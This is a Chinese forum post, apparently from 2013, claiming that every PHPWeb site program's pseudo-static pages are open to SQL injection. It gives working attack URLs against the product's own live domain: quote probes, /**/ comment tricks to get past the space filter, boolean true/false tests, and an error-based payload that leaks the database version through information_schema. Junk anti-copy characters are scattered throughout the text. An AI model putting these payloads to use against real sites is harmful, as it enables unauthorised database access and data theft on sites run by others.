phpweb所有的整站程序伪静态页面都存在sql注入+ g, H& B Y& A7 J. O5 F
; Q5 O9 R5 q9 s0 m3 L* q7 i主站:http://phpweb.net/! {& h; V$ b: O( Q' I& j0 G9 L6 W
加’检测:' k( g2 T- f T( F
3 _2 V1 ?+ k* @0 F C( lhttp://www.phpweb.net/down/html/?772′.html, L( W3 E+ a2 C; G9 H# U
# j, d4 n0 `" o$ J$ Z# m. I
出错; ^; W: M: s; Q. U: z! H5 C
存在注入。$ o5 t7 i: C% Q# n5 c
不能用空格,只能用/*罗
7 w! J* M$ u( D* r1 ihttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
4 p: B" P( f- @: a _ # a2 y6 v1 f6 `' P- V
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.9 c8 g, q0 U5 y9 L# r) \
爆数据库版本:: b9 y3 w1 f5 @) H3 E
3 a' V9 L. O# I' O- [' N3 l?
. U8 a0 w* X! v8 B3 N2 V1
! |" ?& | ~8 e2 s1 Dhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
6 Q3 Y# m3 ?/ m6 ?! {( M更新日期: 2013-01-03 13:39:50 8 e5 Y+ Z# Z+ L; u" ]1 d
|
发表于 2013-1-4 19:46:42
收藏
支持
反对